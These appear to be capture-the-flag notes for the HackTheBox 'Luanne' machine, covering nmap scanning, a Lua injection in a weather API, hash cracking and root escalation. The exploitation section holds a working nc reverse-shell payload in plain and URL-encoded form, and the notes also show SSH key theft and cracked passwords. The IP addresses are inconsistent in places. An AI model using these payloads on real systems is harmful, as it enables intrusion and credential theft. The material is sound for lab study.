○ Scanning 

nmap -sC -sV -oA nmap 10.10.10.218 -Pn
》》22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)

》》80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized

》》 9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response

》》Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

==================

○ Enumeration
》web - 80 >> robots.txt : /weather/
》Directory >> dirb
  >> /weather/forecast/
  >> /weather/forecast/?city=list

==================

○ Exploitation 

--payload= ');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.9 9001 >/tmp/f")--
URL encoding 

city=London%27)%3Bos.execute(%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20
%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-
i%202%3E%261%7Cnc%2010.10.16.86%209001%20%3E%2Ftmp%2Ff%22)--

$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
$ john creds.txt --wordlist=/usr/share/wordlists/rockyou.txt
iamthebest
$ uname -a;id;
NetBSD luanne.htb 9.0 NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020
mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/amd64/compile/GENERIC amd64
uid=24(_httpd) gid=24(_httpd) 

====================

○ Post Exploitation 

>>On victim machine 
curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/user.txt
Take id_rsa to /tmp 
Then send it to kali and give it 600 

>>on kali
ssh -i id_rsa r.michaels@10.10.10.216 

luanne$ ls 
Backup user.txt
luanne$ cd /backup 
devel_backup-2020-09-16.tar.gz.enc
luanne$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output/tmp/smog.tar.gz
luanne$ tar -xzf smog.tar.gz
After some enumeration >> we found file .htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
$ john creds.txt --wordlist=/usr/share/wordlists/rockyou.txt
littlebear
doas -u root /bin/sh
Cat root.txt
7a9b5c206e8e8ba09bb99bd113675f66
